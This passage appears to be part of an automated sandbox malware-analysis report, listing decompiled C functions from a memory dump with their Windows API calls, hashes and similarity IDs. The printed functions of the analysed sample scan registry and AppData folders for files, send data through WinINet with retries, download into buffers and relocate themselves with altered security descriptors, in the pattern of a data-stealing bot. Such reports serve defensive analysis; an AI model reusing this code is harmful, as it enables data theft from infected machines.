    							 *((char*)(_t109 + 0x34)) = 1;
    							if(_t77 != 0) {
    								_t77 = HeapAlloc( *0x42e6d4, 8, _t77 + 4);
    							}
    							 *(_t109 + 0x18) = _t77;
    							if(_t77 == 0) {
    								L26:
    								_t88 = _v8;
    							} else {
    								_t81 = SelectObject( *_t109,  *(_t109 + 0x10));
    								 *(_t109 + 4) = _t81;
    								_t88 = 1;
    								if(_t81 == 0) {
    									goto L26;
    								}
    							}
    							HeapFree( *0x42e6d4, 0, _t108);
    							if(_t88 == 0) {
    								DeleteObject( *(_t109 + 0x10));
    								goto L29;
    							}
    						}
    					}
    					return _t109;
    				} else {
    					return _t63;
    				}
    			}

    APIs
    • HeapAlloc.KERNEL32(?,00000008,00000058,00000000,?,75315FF0,?,00000000,00406501,?), ref: 00406097
    • CreateCompatibleBitmap.GDI32(00000000,?,?), ref: 004060CF
    Memory Dump Source
    • Source File: 00000000.00000002.200969767.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.200956781.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.201020494.000000000042D000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.201038570.0000000000430000.00000002.00020000.sdmp
    Similarity
    • API ID: AllocBitmapCompatibleCreateHeap
    • String ID:
    • API String ID: 4176786261-0
    • Opcode ID: c67a114f76833c92d784cf3014efd3b0814f4007bf76bacdb640805016c5b1ac
    • Instruction ID: afa41e4b25c1fd39c5fc92f4fab930d1337b51f6ca3c5dc729ab851e3868f702
    • Opcode Fuzzy Hash: c67a114f76833c92d784cf3014efd3b0814f4007bf76bacdb640805016c5b1ac
    • Instruction Fuzzy Hash: 5E51F171204742ABD330CB65D840B67BBE4AF65300F04892EE9C7DBB91DB78E854C769
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 97%
    			E0040E840(void* __ecx, void* __edx, void* __eflags, void* _a4) {
    				char _v680;
    				char _v808;
    				char _v1072;
    				char _v1084;
    				char* _v1088;
    				long _v1092;
    				char* _v1096;
    				long _v1100;
    				intOrPtr _v1104;
    				intOrPtr _v1108;
    				void* _v1112;
    				void* _v1116;
    				void* _v1120;
    				char _v1124;
    				char _v1128;
    				void* _v1132;
    				void* _v1136;
    				void* _v1140;
    				char _v1144;
    				void* _v1148;
    				void* __ebx;
    				void* __edi;
    				void* __esi;
    				void _t47;
    				void* _t50;
    				signed int _t58;
    				void _t62;
    				void* _t84;
    				void* _t90;
    				void* _t101;
    				void* _t104;
    				void* _t108;
    				void* _t110;
    				void* _t112;
    
    				_t97 = __edx;
    				_t108 = E0041CDD0(__eflags, 0x8387a395, 2);
    				_t47 = 0;
    				_v1120 = _t108;
    				if(_t108 != 0) {
    					 *0x42d424 = 0;
    					while(1) {
    						__eflags = _t47;
    						if(_t47 != 0) {
    							goto L8;
    						}
    						_t90 = _a4;
    						__eflags =  *((intOrPtr*)(_t90 + 0x1c)) - _t47;
    						if( *((intOrPtr*)(_t90 + 0x1c)) != _t47) {
    							__eflags =  *(_t90 + 0x14) - 0x40;
    							if( *(_t90 + 0x14) >= 0x40) {
    								_t101 = _t90 + 0x30;
    								L9:
    								_t97 =  *(_t90 + 0x14);
    								_t50 = _t101 - _t90 + 0x10;
    								__eflags = _t50 - _t97;
    								if(_t50 <= _t97) {
    									__eflags =  *((intOrPtr*)(_t101 + 8)) + _t50 - _t97;
    									if( *((intOrPtr*)(_t101 + 8)) + _t50 <= _t97) {
    										__eflags =  *((intOrPtr*)(_t101 + 0xc)) - 0x10;
    										_v1120 = _t101;
    										if( *((intOrPtr*)(_t101 + 0xc)) > 0x10) {
    											_t84 = E00418C20(_t101);
    											_v1132 = _t84;
    											__eflags = _t84;
    											if(_t84 != 0) {
    												_push(_t84);
    												_t58 = E0040E480(_t97) & 0x0000ffff;
    												_v1132 = _t58;
    												_v1128 = 0xffffffff;
    												__eflags = _t58;
    												if(_t58 == 0) {
    													_t19 = _t84 + 0x10; // 0x10
    													_t112 = E00410AA0(_t19, 0xfde9,  *((intOrPtr*)(_t101 + 0xc)) - 0x10);
    													__eflags = _t112;
    													if(_t112 != 0) {
    														_t97 =  &_v1128;
    														_v1136 = E0040E660(_t112,  &_v1128) & 0x0000ffff;
    														HeapFree( *0x42e6d4, 0, _t112);
    													} else {
    														_v1132 = 0xc5;
    													}
    												}
    												_t110 = E00423A90();
    												__eflags = _t110;
    												if(_t110 != 0) {
    													_v1120 = 0;
    													_t62 = E00418BD0(0x4e23, 0x10000000, _t110);
    													__eflags = _t62;
    													if(_t62 == 0) {
    														_t104 = _v1120;
    													} else {
    														_t104 = E00418C20(_t62);
    													}
    													_t97 =  *0x42e6d4;
    													HeapFree( *0x42e6d4, 0, _t110);
    													__eflags = _t104;
    													if(_t104 != 0) {
    														__eflags =  *_t104;
    														if( *_t104 != 0) {
    															E0041D150( &_v808);
    															E00410820( &_v1072,  &_v680, 0x102);
    															_v1116 = _v1148;
    															_v1124 = _v1144;
    															_v1120 = _v1140;
    															_push( &_v1112);
    															_v1112 = _t104;
    															_v1108 = E0040E2D0;
    															_v1104 = E0040E470;
    															_v1100 = 0;
    															_v1096 =  &_v1084;
    															_v1092 = 0;
    															_v1088 =  &_v1124;
    															E0040D4A0();
    														}
    														_t97 =  *0x42e6d4;
    														HeapFree( *0x42e6d4, 0, _t104);
    													}
    													_t84 = _v1136;
    												}
    												HeapFree( *0x42e6d4, 0, _t84);
    												_t108 = _v1116;
    											}
    										}
    										_t47 = _v1120;
    										continue;
    									}
    								}
    							}
    						}
    						HeapFree( *0x42e6d4, 0, _t90);
    						E0040E230(_t97);
    						ReleaseMutex(_t108);
    						CloseHandle(_t108);
    						__eflags = 0;
    						return 0;
    						goto L28;
    						L8:
    						_t101 =  *((intOrPtr*)(_t47 + 8)) + _t47 + 0x10;
    						_t90 = _a4;
    						goto L9;
    					}
    				} else {
    					return 1;
    				}
    				L28:
    			}

    APIs
      • Part of subcall function 0041CDD0: CreateMutexW.KERNEL32(0042E930,00000000,?,?,?,?,?), ref: 0041CE18
      • Part of subcall function 0041CDD0: WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 0041CE27
      • Part of subcall function 0041CDD0: CloseHandle.KERNEL32(00000000), ref: 0041CE39
    • HeapFree.KERNEL32(?,00000000,00000000), ref: 0040E989
    Memory Dump Source
    • Source File: 00000000.00000002.200969767.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.200956781.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.201020494.000000000042D000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.201038570.0000000000430000.00000002.00020000.sdmp
    Similarity
    • API ID: CloseCreateFreeHandleHeapMutexObjectSingleWait
    • String ID:
    • API String ID: 1654186904-0
    • Opcode ID: f292e5b193641bfdc1c34acc1aedca85b5cd6b081b5f589da154883b10082ddc
    • Instruction ID: bbe094fab3c94494c41159912f04e2bdce726cc135ceb8da3176096c6eb6c179
    • Opcode Fuzzy Hash: f292e5b193641bfdc1c34acc1aedca85b5cd6b081b5f589da154883b10082ddc
    • Instruction Fuzzy Hash: BD51E4B16043419BC314EF66D880A5BB7E5BF88344F404D3EF984AB291D778D816CBDA
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 74%
    			E0040D4A0() {
    				void* _t30;
    				void* _t31;
    				signed int _t36;
    				signed char _t41;
    				void* _t42;
    				void* _t45;
    				int _t47;
    				void* _t49;
    				intOrPtr _t55;
    				void* _t64;
    				void* _t67;
    				intOrPtr* _t69;
    				void* _t70;
    
    				_t69 =  *((intOrPtr*)(_t70 + 0x2c));
    				_t55 =  *((intOrPtr*)(_t69 + 0x14));
    				 *((char*)(_t70 + 0x34)) = 0;
    				if(E004173A0(_t70 + 0x20,  *_t69) == 0) {
    					L28:
    					 *((intOrPtr*)(_t69 + 0x14)) = _t55;
    					return  *((intOrPtr*)(_t70 + 0x34));
    				} else {
    					if( *0x42eb6c == 0) {
    						 *0x42eb6c = E00413580();
    					}
    					 *(_t70 + 0x17) = 0;
    					while( *((char*)(_t70 + 0x34)) == 0) {
    						if( *(_t70 + 0x17) <= 0) {
    							L10:
    							_t36 =  *(_t70 + 0x17) & 1;
    							if(_t36 < 0) {
    								_t36 = (_t36 - 0x00000001 | 0xfffffffe) + 1;
    							}
    							asm("sbb eax, eax");
    							_t67 = E00412FC0( ~_t36 + 1,  *0x42eb6c,  *(_t70 + 0x20),  *((intOrPtr*)(_t70 + 0x2c)));
    							if(_t67 == 0) {
    								L23:
    								_t41 =  *(_t70 + 0x17) + 1;
    								 *(_t70 + 0x17) = _t41;
    								if(_t41 < 5) {
    									continue;
    								}
    								break;
    							} else {
    								_t64 = 0;
    								_push(0);
    								_push(_t69);
    								_push(_t67);
    								_t45 = E0040D360(_t55, _t70 + 0x2c);
    								if(_t45 == 2) {
    									L19:
    									 *(_t70 + 0x28) = 0;
    									 *((intOrPtr*)(_t70 + 0x2c)) = 4;
    									_t47 = InternetQueryOptionA(_t67, 0x15, _t70 + 0x1c, _t70 + 0x1c);
    									InternetCloseHandle(_t67);
    									if(_t47 != 0) {
    										_t49 =  *(_t70 + 0x18);
    										if(_t49 != 0 &&  *(_t70 + 0x1c) == 4) {
    											InternetCloseHandle(_t49);
    										}
    									}
    									goto L23;
    								}
    								while(_t45 != 1) {
    									_t64 = _t64 + 1;
    									_push(_t64);
    									_push(_t69);
    									_push(_t67);
    									_t45 = E0040D360(_t55, _t70 + 0x2c);
    									if(_t45 != 2) {
    										continue;
    									}
    									goto L19;
    								}
    								 *((char*)(_t70 + 0x34)) = 1;
    								goto L19;
    							}
    						}
    						_t42 =  *(_t69 + 0xc);
    						_push(0x1388);
    						if(_t42 == 0) {
    							Sleep();
    							goto L10;
    						}
    						if(WaitForSingleObject(_t42, ??) != 0x102) {
    							break;
    						}
    						goto L10;
    					}
    					_t30 =  *(_t70 + 0x20);
    					if(_t30 != 0) {
    						HeapFree( *0x42e6d4, 0, _t30);
    					}
    					_t31 =  *(_t70 + 0x24);
    					if(_t31 != 0) {
    						HeapFree( *0x42e6d4, 0, _t31);
    					}
    					goto L28;
    				}
    			}

    APIs
      • Part of subcall function 004173A0: InternetCrackUrlA.WININET(?,00000000,00000000), ref: 004173D7
    • WaitForSingleObject.KERNEL32(?,00001388), ref: 0040D4FE
    • Sleep.KERNEL32(00001388), ref: 0040D511
    • InternetQueryOptionA.WININET(00000000,00000015,?,?), ref: 0040D59D
    • InternetCloseHandle.WININET(00000000), ref: 0040D5AC
    • InternetCloseHandle.WININET(?), ref: 0040D5C2
    • HeapFree.KERNEL32(?,00000000,?), ref: 0040D5EE
    • HeapFree.KERNEL32(?,00000000,?), ref: 0040D601
      • Part of subcall function 00413580: LoadLibraryA.KERNEL32(urlmon.dll,?,?), ref: 0041358F
      • Part of subcall function 00413580: GetProcAddress.KERNEL32(00000000,ObtainUserAgentString), ref: 004135A5
      • Part of subcall function 00413580: FreeLibrary.KERNEL32(00000000), ref: 00413605
    Memory Dump Source
    • Source File: 00000000.00000002.200969767.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.200956781.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.201020494.000000000042D000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.201038570.0000000000430000.00000002.00020000.sdmp
    Similarity
    • API ID: Internet$Free$CloseHandleHeapLibrary$AddressCrackLoadObjectOptionProcQuerySingleSleepWait
    • String ID:
    • API String ID: 2632256483-0
    • Opcode ID: a691918fa853fe8352daf15c35d4ce3b320cfd7eea674cf944e8dde1066852d6
    • Instruction ID: cba55708ce18109a4cdb01303e2cd6a308a4523a4e1c7b4f716367dd3363b6e5
    • Opcode Fuzzy Hash: a691918fa853fe8352daf15c35d4ce3b320cfd7eea674cf944e8dde1066852d6
    • Instruction Fuzzy Hash: ED416531A04244AFD720DB69CC44B6B7BE8AB99708F14492FF845E32D0D638DD49CB6A
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 76%
    			E004215B0(void* __eflags) {
    				char _v660;
    				short _v1180;
    				short _v1700;
    				void* _v1712;
    				char _v1720;
    				char _v1764;
    				char _v1776;
    				char _v1800;
    				intOrPtr _v1820;
    				intOrPtr _v1824;
    				char _v1828;
    				intOrPtr _v1832;
    				char _v1836;
    				intOrPtr _v1840;
    				void* _v1844;
    				char _v1852;
    				intOrPtr _v1860;
    				char _v1864;
    				void* __esi;
    				void* _t34;
    				void* _t35;
    				void* _t70;
    				intOrPtr* _t71;
    				char* _t75;
    				signed int _t76;
    				char* _t77;
    				void** _t78;
    				intOrPtr _t85;
    
    				_t78 =  &_v1844;
    				E00410870( &_v1844,  &_v1844, 0, 8);
    				E00424100(0x77,  &_v1764);
    				E00424100(0x78,  &_v1828);
    				_t34 = E00416420(0x80000001,  &_v1764,  &_v1828, 0x104);
    				if(_t34 != 0xffffffff && _t34 != 0) {
    					ExpandEnvironmentStringsW( &_v1700,  &_v1180, 0x104);
    					_t77 =  &_v1800;
    					E00424100(0x71, _t77);
    					_v1836 = _t77;
    					E00418700( &_v1180,  &_v1836, 1, 5, E00421310,  &_v1844, 0, 0, 0);
    				}
    				if(_v1840 == 0) {
    					_t75 =  &_v1776;
    					E00424100(0x79, _t75);
    					_t71 = __imp__SHGetFolderPathW;
    					_v1828 = 0x1a;
    					_v1824 = 0x26;
    					_v1820 = 0x23;
    					_v1832 = _t75;
    					_t76 = 0;
    					do {
    						_push( &_v1700);
    						_push(0);
    						_push(0);
    						_push( *((intOrPtr*)(_t78 + 0x18 + _t76 * 4)));
    						_push(0);
    						if( *_t71() == 0) {
    							E00418700( &_v1720,  &_v1852, 1, 2, E00421310,  &_v1864, _t44, _t44, _t44);
    						}
    						_t76 = _t76 + 1;
    					} while (_t76 < 3);
    					_t85 = _v1860;
    				}
    				_t35 = _v1844;
    				if(_t85 <= 0) {
    					if(_t35 != 0) {
    						return HeapFree( *0x42e6d4, 0, _t35);
    					}
    					goto L16;
    				} else {
    					_t70 = _t35;
    					if(_t35 == 0) {
    						L16:
    						return _t35;
    					} else {
    						if( *_t35 != 0) {
    							E00424100(0x7a,  &_v660);
    							E0040D880(_t70, 0xcb,  &_v660);
    						}
    						return HeapFree( *0x42e6d4, 0, _t70);
    					}
    				}
    			}

    APIs
      • Part of subcall function 00416420: RegOpenKeyExW.ADVAPI32(80000002,00000000,00000000,00000001,00000000,?,00000000,00000000,?,004106E6,?,?,00000104,?,00000000), ref: 00416448
      • Part of subcall function 00416420: RegQueryValueExW.ADVAPI32(?,?,00000000,?,?,?,?,00000000), ref: 00416469
      • Part of subcall function 00416420: RegCloseKey.ADVAPI32(?,?,00000000), ref: 0041647B
    • ExpandEnvironmentStringsW.KERNEL32(?,?,00000104,?,?,00000104,00000000,00000000,00000008,?,00000000), ref: 0042161E
      • Part of subcall function 00418700: PathCombineW.SHLWAPI(?,?,0040365E,?,00000000), ref: 0041873C
      • Part of subcall function 00418700: FindFirstFileW.KERNEL32(?,?,?,00000000), ref: 00418757
      • Part of subcall function 00418700: WaitForSingleObject.KERNEL32(00000000,00000000,?,00000000), ref: 00418777
      • Part of subcall function 00418700: PathMatchSpecW.SHLWAPI(?), ref: 004187DD
      • Part of subcall function 00418700: PathCombineW.SHLWAPI(?,?,0000002C), ref: 00418844
    • SHGetFolderPathW.SHELL32(00000000,0000001A,00000000,00000000,?), ref: 004216B3
    • HeapFree.KERNEL32(?,00000000,?,?,?,00000104,00000000,00000000), ref: 00421720
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.200969767.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.200956781.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.201020494.000000000042D000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.201038570.0000000000430000.00000002.00020000.sdmp
    Similarity
    • API ID: Path$Combine$CloseEnvironmentExpandFileFindFirstFolderFreeHeapMatchObjectOpenQuerySingleSpecStringsValueWait
    • String ID: #$&
    • API String ID: 2302067336-3870246384
    • Opcode ID: 257ebb35da3145f9f30ba44be4ebc822457156ad565f95c58b1e28ee01885c8a
    • Instruction ID: 529c89069b48fbad7a1370ad3f9cada1e1cb8e9a2cab55626a055c3d4dc76843
    • Opcode Fuzzy Hash: 257ebb35da3145f9f30ba44be4ebc822457156ad565f95c58b1e28ee01885c8a
    • Instruction Fuzzy Hash: 2841D6317443106FE724DB11EC45FAB77A8EBD4704F80481EF685972D0DBB8A945CB9A
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 84%
    			E0040C490(WCHAR* __edi, void* __esi, char _a4) {
    				WCHAR* _v0;
    				WCHAR* _v16;
    				char _v20;
    				int _v24;
    				int _v28;
    				struct _SECURITY_DESCRIPTOR* _v32;
    				struct _ACL* _v36;
    				char _v672;
    				char _v800;
    				char _v1064;
    				char _v1134;
    				intOrPtr _v1166;
    				char _v1564;
    				short _v1656;
    				long _t31;
    				WCHAR* _t34;
    				int _t37;
    				WCHAR* _t39;
    				signed int _t40;
    				void* _t42;
    				int _t50;
    				signed int _t52;
    				signed int _t53;
    				void* _t55;
    				signed int _t56;
    				WCHAR* _t57;
    				void* _t58;
    				struct _ACL* _t59;
    				WCHAR* _t68;
    				WCHAR* _t75;
    				void* _t80;
    				void* _t81;
    
    				_t75 = __edi;
    				_t81 = _t80 - 0x67c;
    				if( *0x42d4f8 == 0) {
    					 *0x42d4f8 = 0;
    					E0041D150( &_v800);
    					E00410820( &_v1064,  &_v672, 0x102);
    					E00412640( &_v1064, E00410820( &_v1564, 0x42eb80, 0x1e6), 0x1e6);
    					_t50 = 0;
    					if(_v1166 != 0) {
    						do {
    							_t50 = _t50 + 1;
    						} while ( *((char*)(_t81 + _t50 + 0x212)) != 0);
    					}
    					_t52 = MultiByteToWideChar(0, 0,  &_v1134, _t50,  &_v1656, 0x32);
    					if(_t52 >= 0x32) {
    						_t52 = 0;
    					}
    					 *((short*)(_t81 + 8 + _t52 * 2)) = 0;
    					if(_t52 != 0) {
    						_t68 =  &_v1656;
    						while(1) {
    							_t56 =  *_t68 & 0x0000ffff;
    							if(_t56 != 0x5c && _t56 != 0x2f) {
    								break;
    							}
    							_t68 =  &(_t68[1]);
    						}
    						_t57 = PathCombineW(0x42d4f8, 0x42e958, _t68);
    						__eflags = _t57;
    						if(_t57 == 0) {
    							__eflags = 0;
    							 *0x42d4f8 = 0;
    						}
    					}
    					_t53 = 0;
    					__eflags =  *0x42d4f8 - _t53; // 0x0
    					if(__eflags != 0) {
    						do {
    							_t53 = _t53 + 1;
    							__eflags = 0x42d4f8[_t53];
    						} while (0x42d4f8[_t53] != 0);
    					}
    					_t55 = E00410820(0x42d700, 0x42d4f8, _t53 + _t53);
    					__eflags = 0;
    					 *((short*)(_t55 + 0x42d700)) = 0;
    					_t31 = PathRemoveFileSpecW(0x42d700);
    				}
    				__eflags = _t75;
    				if(_t75 != 0) {
    					_t40 = 0;
    					__eflags =  *0x42d4f8 - _t40; // 0x0
    					if(__eflags != 0) {
    						do {
    							_t40 = _t40 + 1;
    							__eflags = 0x42d4f8[_t40];
    						} while (0x42d4f8[_t40] != 0);
    					}
    					_t42 = E00410820(_t75, 0x42d4f8, _t40 + _t40);
    					__eflags = 0;
    					 *((short*)(_t42 + _t75)) = 0;
    					_t31 = PathRenameExtensionW(_t75, L".tmp");
    				}
    				__eflags = _a4;
    				if(_a4 == 0) {
    					L24:
    					return _t31;
    				} else {
    					__eflags =  *0x42eb64 - 1;
    					if( *0x42eb64 <= 1) {
    						goto L24;
    					} else {
    						E00418550(0x42d700);
    						_push(0x42d700);
    						L25();
    						_t31 = GetFileAttributesW(0x42d4f8);
    						__eflags = _t31 - 0xffffffff;
    						if(_t31 == 0xffffffff) {
    							goto L24;
    						} else {
    							_v0 = 0x42d4f8;
    							_t59 = 0;
    							E004129B0(L"SeSecurityPrivilege");
    							_t34 =  &_v20;
    							__imp__ConvertStringSecurityDescriptorToSecurityDescriptorW(L"S:(ML;CIOI;NRNWNX;;;LW)", 1, _t34, 0, _t58);
    							__eflags = _t34;
    							if(_t34 != 0) {
    								_v36 = 0;
    								_t37 = GetSecurityDescriptorSacl(_v32,  &_v24,  &_v36,  &_v28);
    								__eflags = _t37;
    								if(_t37 != 0) {
    									_t39 = _v16;
    									__imp__SetNamedSecurityInfoW(_t39, 1, 0x10, 0, 0, 0, _v36);
    									__eflags = _t39;
    									if(_t39 == 0) {
    										_t59 = 1;
    									}
    								}
    								LocalFree(_v32);
    							}
    							return _t59;
    						}
    					}
    				}
    			}

    APIs
    • MultiByteToWideChar.KERNEL32(00000000,00000000,?,00000000,?,00000032,00000000,000001E6,?,0042EB80,000001E6,?,?,00000102,00000000), ref: 0040C520
    • PathCombineW.SHLWAPI(0042D4F8,0042E958,?), ref: 0040C55D
    • PathRemoveFileSpecW.SHLWAPI(0042D700,0042D700,0042D4F8,00000000), ref: 0040C5AC
    • PathRenameExtensionW.SHLWAPI(-00000001,.tmp,-00000001,0042D4F8,00000000,00000000), ref: 0040C5E7
    • GetFileAttributesW.KERNEL32(0042D4F8,0042D700,0042D700), ref: 0040C619
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.200969767.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.200956781.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.201020494.000000000042D000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.201038570.0000000000430000.00000002.00020000.sdmp
    Similarity
    • API ID: Path$File$AttributesByteCharCombineExtensionMultiRemoveRenameSpecWide
    • String ID: .tmp
    • API String ID: 818041824-2986845003
    • Opcode ID: 8c7bba708fae7dfad544b445b507d7f77c94fd5acb9d89d60e018daefddf60cf
    • Instruction ID: e4e57dbdfb65924a6dabcaff6c63d5dc16d0c4cfd39cff38348e401230c4bf60
    • Opcode Fuzzy Hash: 8c7bba708fae7dfad544b445b507d7f77c94fd5acb9d89d60e018daefddf60cf
    • Instruction Fuzzy Hash: 0D41D774A44320B9D324B734DC86BAB32A59B94704F604A3FF455E61F0E6B875C5826E
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 85%
    			E00413180(void* _a4, intOrPtr _a12, void* _a16) {
    				long _v4;
    				void** _v8;
    				intOrPtr _v20;
    				intOrPtr _t14;
    				void* _t15;
    				long _t16;
    				void* _t18;
    				intOrPtr _t24;
    				void** _t25;
    				void* _t44;
    				void* _t49;
    
    				_t14 = _a12;
    				if(_t14 == 0 || _t14 > 0xa00000) {
    					_a12 = 0xa00000;
    				}
    				_t44 = 0;
    				_t49 = 0;
    				while(1) {
    					_t15 = _a16;
    					if(_t15 != 0 && WaitForSingleObject(_t15, 0) != 0x102) {
    						break;
    					}
    					_t4 = _t44 + 0x1000; // 0x1000
    					_t16 = _t4;
    					_v4 = 0x1000;
    					if(_t16 != 0) {
    						_push(_t16 + 4);
    						if(_t49 != 0) {
    							_t18 = HeapReAlloc( *0x42e6d4, 8, _t49, ??);
    						} else {
    							_t18 = HeapAlloc( *0x42e6d4, 8, ??);
    						}
    						if(_t18 == 0) {
    							break;
    						} else {
    							_t49 = _t18;
    							goto L15;
    						}
    					} else {
    						if(_t49 != 0) {
    							HeapFree( *0x42e6d4, _t16, _t49);
    						}
    						_t49 = 0;
    						L15:
    						if(InternetReadFile(_a4, _t49 + _t44, _v4,  &_v4) == 0) {
    							break;
    						} else {
    							_t24 = _v20;
    							if(_t24 == 0) {
    								_t25 = _v8;
    								if(_t25 == 0) {
    									if(_t49 != 0) {
    										HeapFree( *0x42e6d4, 0, _t49);
    									}
    									return 1;
    								} else {
    									_t25[1] = _t44;
    									 *_t25 = _t49;
    									return 1;
    								}
    							} else {
    								_t44 = _t44 + _t24;
    								if(_t44 <= _v4) {
    									continue;
    								} else {
    									break;
    								}
    							}
    						}
    					}
    					L26:
    				}
    				if(_t49 != 0) {
    					HeapFree( *0x42e6d4, 0, _t49);
    				}
    				return 0;
    				goto L26;
    			}

    APIs
    • WaitForSingleObject.KERNEL32(?,00000000,00000000,?,?,?,?,0040D43D,00000000,?,00000000,?,?,?,?,00000000), ref: 004131BB
    • HeapFree.KERNEL32(?,00001000,00000000,00000000,?,?,?,?,0040D43D,00000000,?,00000000,?,?,?), ref: 004131EA
    • HeapAlloc.KERNEL32(?,00000008,00000FFC,00000000,?,?,?,?,0040D43D,00000000,?,00000000,?,?,?), ref: 00413201
    • HeapReAlloc.KERNEL32(?,00000008,00000000,00000FFC,00000000,?,?,?,?,0040D43D,00000000,?,00000000,?,?,?), ref: 00413213
    • InternetReadFile.WININET(?,?,00001000,00001000), ref: 00413232
    • HeapFree.KERNEL32(?,00000000,00000000,?,00000000,?,00000001,?), ref: 0041325A
    • HeapFree.KERNEL32(?,00000000,00000000,?,00001000,00001000,?,00000000,?,00000001,?), ref: 0041328B
    Memory Dump Source
    • Source File: 00000000.00000002.200969767.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.200956781.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.201020494.000000000042D000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.201038570.0000000000430000.00000002.00020000.sdmp
    Similarity
    • API ID: Heap$Free$Alloc$FileInternetObjectReadSingleWait
    • String ID:
    • API String ID: 2060653657-0
    • Opcode ID: a63dca9bc62d992b501af83569d4c70c2cc26be05c2863c513a8ed949bb476ff
    • Instruction ID: 6edeb96ccb4289ae3f40e531dace3e01eedc329a036e8ab75c038a7c9d98eee6
    • Opcode Fuzzy Hash: a63dca9bc62d992b501af83569d4c70c2cc26be05c2863c513a8ed949bb476ff
    • Instruction Fuzzy Hash: 1431E132700311ABD720DFA6EC44F9BB7D8EB94B52F50492AFA51D7240DB34ED4587A8
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 74%
    			E00420A60(void* __eflags) {
    				char _v660;
    				short _v1180;
    				short _v1700;
    				void* _v1712;
    				char _v1720;
    				char _v1752;
    				char _v1776;
    				char _v1788;
    				intOrPtr _v1792;
    				intOrPtr _v1796;
    				intOrPtr _v1800;
    				intOrPtr _v1804;
    				intOrPtr _v1808;
    				void* _v1812;
    				char _v1824;
    				intOrPtr _v1828;
    				char _v1832;
    				void* __esi;
    				void* _t31;
    				void* _t32;
    				void* _t63;
    				intOrPtr* _t64;
    				char* _t68;
    				signed int _t69;
    				void** _t70;
    				intOrPtr _t78;
    
    				_t70 =  &_v1812;
    				E00410870( &_v1812,  &_v1812, 0, 8);
    				E00424100(0x60,  &_v1752);
    				E00424100(0x61,  &_v1776);
    				_t31 = E00416420(0x80000002,  &_v1752,  &_v1776, 0x104);
    				if(_t31 != 0xffffffff && _t31 != 0) {
    					ExpandEnvironmentStringsW( &_v1700,  &_v1180, 0x104);
    					E004207B0( &_v1180,  &_v1812);
    				}
    				if(_v1808 == 0) {
    					_t68 =  &_v1788;
    					E00424100(0x62, _t68);
    					_t64 = __imp__SHGetFolderPathW;
    					_v1800 = 0x23;
    					_v1796 = 0x1a;
    					_v1792 = 0x26;
    					_v1804 = _t68;
    					_t69 = 0;
    					do {
    						_push( &_v1700);
    						_push(0);
    						_push(0);
    						_push( *((intOrPtr*)(_t70 + 0x14 + _t69 * 4)));
    						_push(0);
    						if( *_t64() == 0) {
    							E00418700( &_v1720,  &_v1824, 1, 2, E00420820,  &_v1832, _t41, _t41, _t41);
    						}
    						_t69 = _t69 + 1;
    					} while (_t69 < 3);
    					_t78 = _v1828;
    				}
    				_t32 = _v1812;
    				if(_t78 <= 0) {
    					if(_t32 != 0) {
    						return HeapFree( *0x42e6d4, 0, _t32);
    					}
    					goto L16;
    				} else {
    					_t63 = _t32;
    					if(_t32 == 0) {
    						L16:
    						return _t32;
    					} else {
    						if( *_t32 != 0) {
    							E00424100(0x63,  &_v660);
    							E0040D880(_t63, 0xcb,  &_v660);
    						}
    						return HeapFree( *0x42e6d4, 0, _t63);
    					}
    				}
    			}

    APIs
      • Part of subcall function 00416420: RegOpenKeyExW.ADVAPI32(80000002,00000000,00000000,00000001,00000000,?,00000000,00000000,?,004106E6,?,?,00000104,?,00000000), ref: 00416448
      • Part of subcall function 00416420: RegQueryValueExW.ADVAPI32(?,?,00000000,?,?,?,?,00000000), ref: 00416469
      • Part of subcall function 00416420: RegCloseKey.ADVAPI32(?,?,00000000), ref: 0041647B
    • ExpandEnvironmentStringsW.KERNEL32(?,?,00000104,?,?,00000104,00000000,00000000,00000008,?,00000000), ref: 00420ACE
    • SHGetFolderPathW.SHELL32(00000000,00000023,00000000,00000000,?,?), ref: 00420B31
    • HeapFree.KERNEL32(?,00000000,?,?,?,00000104,00000000,00000000), ref: 00420B9E
    • HeapFree.KERNEL32(?,00000000,?,?,?,00000104,00000000,00000000), ref: 00420BBB
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.200969767.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.200956781.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.201020494.000000000042D000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.201038570.0000000000430000.00000002.00020000.sdmp
    Similarity
    • API ID: FreeHeap$CloseEnvironmentExpandFolderOpenPathQueryStringsValue
    • String ID: #$&
    • API String ID: 2803132047-3870246384
    • Opcode ID: 86513f084deb74ac85c27ef12ef1d3b6135b7c2c306b57b0ff0ee37d446761b3
    • Instruction ID: 54097a956722f362ae01df46ae7e672af1e15e3138718c7b55b777e4d0e0a482
